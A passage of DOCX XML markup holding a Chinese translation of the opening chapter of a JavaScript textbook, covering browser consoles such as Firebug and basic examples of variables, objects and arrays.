        <w:t>宿主环境</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:r>
        <w:t>enviroment</w:t>
      </w:r>
      <w:r>
        <w:t>）提供的。这里所说的宿主环境通常是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器（第</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章会介绍两个不基于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>宿主环境），本书第一部分涵盖了语言本身的特性以及少量的内置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。第二部分讲解了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>如何在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中工作，并涵盖基于浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>API——</w:t>
      </w:r>
      <w:r>
        <w:t>这部分也称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本书第三部分是核心</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的参考手册。比如，在这部分，可以查找</w:t>
      </w:r>
      <w:r>
        <w:t>"Array"</w:t>
      </w:r>
      <w:r>
        <w:t>以获得</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组操作</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的详细信息。第四部分是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>参考手册，比如，你可以在</w:t>
      </w:r>
      <w:r>
        <w:t>这部分查找</w:t>
      </w:r>
      <w:r>
        <w:t>"canvas"</w:t>
      </w:r>
      <w:r>
        <w:t>来获得</w:t>
      </w:r>
      <w:r>
        <w:t>HTML 5</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素定义的图形编程</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书首先讲解初级的基础部分，然后讲解更高级和更抽象的内容。本书的章节也是如此安排以便你能循序阅读。但学习一门新的编程语言绝非易事，当然要完整描述这门语言就没办法苛求知识点的循次渐进，每一种语言特性都和其他特性相互关联，本书的知识点也是前后参照的，有时参照的知识点在后续章节，有时在已经阅读的章节。本章快速介绍了语言核心部分和客户端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>及其关键特性，以便你能更方便更深入地阅读理解后续章节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>初探</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当学习</w:t>
      </w:r>
      <w:r>
        <w:t>一门新的编程语言的时候，应当对照书中的示例边学边动手做，反复演练以加深自己的理解。因此，你需要一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器。幸运的是，每一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器都包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器，当你阅读本书时，你可能已经在电脑上安装了不止一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以通过在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件里写一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签来嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，当浏览器加载</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件的时候，它会自动执行这段代码，随后会有提到。幸运的是，如果运行的是一小段</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，则不必每次都这样做。我们可以利用</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的一</w:t>
      </w:r>
      <w:r>
        <w:t>个强大的革命性的插件</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>（见图</w:t>
      </w:r>
      <w:r>
        <w:t>1-1</w:t>
      </w:r>
      <w:r>
        <w:t>，可以从</w:t>
      </w:r>
      <w:r>
        <w:t>http://getfirebug.com/</w:t>
      </w:r>
      <w:r>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>）来运行这些小段代码，而且如今的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器带有很多开发工具，可以用来调试、试验和学习。通常在浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>菜单中可以看到类似</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>开发者工具</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>控制台</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的选项（</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>内置了</w:t>
      </w:r>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>控制台</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，不过更推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>）。可以通过按</w:t>
      </w:r>
      <w:r>
        <w:t>F12</w:t>
      </w:r>
      <w:r>
        <w:t>键或者</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl+Shift+J</w:t>
      </w:r>
      <w:r>
        <w:t>快捷键来唤醒控制台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。控制台工具通常会在浏览器窗口的顶部或底部，有时候也可以单独打开一个窗口（见图</w:t>
      </w:r>
      <w:r>
        <w:t>1-</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>），这样会更加方便。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>开发者工具面板</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>窗口包含了很多选项卡，可以查看</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档结构、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式、网络请求等。其中第一个选项卡是</w:t>
      </w:r>
      <w:r>
        <w:t>“JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>控制台</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，可以直接输入</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码并运行出结果。用这种方式来调试</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>既简单又实用，这里强烈推荐读者使用这种方式来辅助你阅读本书。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一些现代浏览器有可能实现了一个简单的控制台</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。可以通过使用函数</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>来向控制台输出消息，使用</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>来做</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>简单的输出演示，通过这种方式可以非常方便地调试本书</w:t>
      </w:r>
      <w:r>
        <w:t>的示例代码。同样，也可以通过给</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>函数传入一段文本来弹出一个对话框，但这种输出调试信息的方法更具侵入性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>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4050101" cy="1949569"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="00001.jpeg" descr="00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1.jpeg" descr="00001.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4050101" cy="1949569"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>1-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>控制台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="1_1_JavaScriptYu_Yan_He_Xin_"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言的一个快速概览，也是本书第一部分的快速概览。在本章之后，我们将着重关注</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的基础知识：第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>章讲解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>注释、分号和</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符集；第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章会更加有意思，主要讲解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>变量和赋值。这里有一些示例代码来说明这两章的重点内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所有在双斜</w:t>
      </w:r>
      <w:r>
        <w:t>线之后的内容都属于注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>仔细阅读这里的注释：它们对</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码做了解释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>变量是表示值的一个符号名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>变量是通过</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>关键字声明的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x;//</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>值可以通过等号赋值给变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0:</w:t>
      </w:r>
      <w:r>
        <w:t>通过变量获取其值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持多种数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>x=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=0.01;//</w:t>
      </w:r>
      <w:r>
        <w:t>整数和实数共用一种数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x="hello world";//</w:t>
      </w:r>
      <w:r>
        <w:t>由双引号内的文本构成的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x='JavaScript';//</w:t>
      </w:r>
      <w:r>
        <w:t>单引号内的文本同样构成字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>另一个布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=null;//null</w:t>
      </w:r>
      <w:r>
        <w:t>是一个特殊的值，意思是</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>空</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=undefined;//undefined</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>非常类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中两个非常重要的数据类型是对象和数组。第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍对象，第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍数组，对象和数组在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是如此之重要，以至于你在本书中处处都能看到它们的身影。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的最重要的类型就是对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对象是名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的集合，或字符</w:t>
      </w:r>
      <w:r>
        <w:t>串到值映射的集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var book={//</w:t>
      </w:r>
      <w:r>
        <w:t>对象是由花括号括起来的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>topic:"JavaScript",//</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>"topic"</w:t>
      </w:r>
      <w:r>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fat:true//</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>"fat"</w:t>
      </w:r>
      <w:r>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>右花括号标记了对象的结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>"."</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"[]"</w:t>
      </w:r>
      <w:r>
        <w:t>来访问对象属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>book.topic//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>book["fat"]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>另外一种获取属性的方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>book.author="Flanagan";//</w:t>
      </w:r>
      <w:r>
        <w:t>通过赋值创建一个新属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>book.contents={};//</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>是一个空对象，它没有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样支持数组（以数字为索引的列表）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var primes=[2,3,5,7];//</w:t>
      </w:r>
      <w:r>
        <w:t>拥有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个值的数组，由</w:t>
      </w:r>
      <w:r>
        <w:t>"["</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"]"</w:t>
      </w:r>
      <w:r>
        <w:t>划定边界</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>primes[0]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:t>数组中的第一个元素（索引为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>primes.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>4:</w:t>
      </w:r>
      <w:r>
        <w:t>数组中的元素个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>primes[primes.length-1]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>7:</w:t>
      </w:r>
      <w:r>
        <w:t>数组的最后一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>primes[4]=9;//</w:t>
      </w:r>
      <w:r>
        <w:t>通过赋值来添加新元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>primes[4]=11;//</w:t>
      </w:r>
      <w:r>
        <w:t>或通过赋值来改变已有的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>empty=[];//[]</w:t>
      </w:r>
      <w:r>
        <w:t>是空数组，它具有</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>empty.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
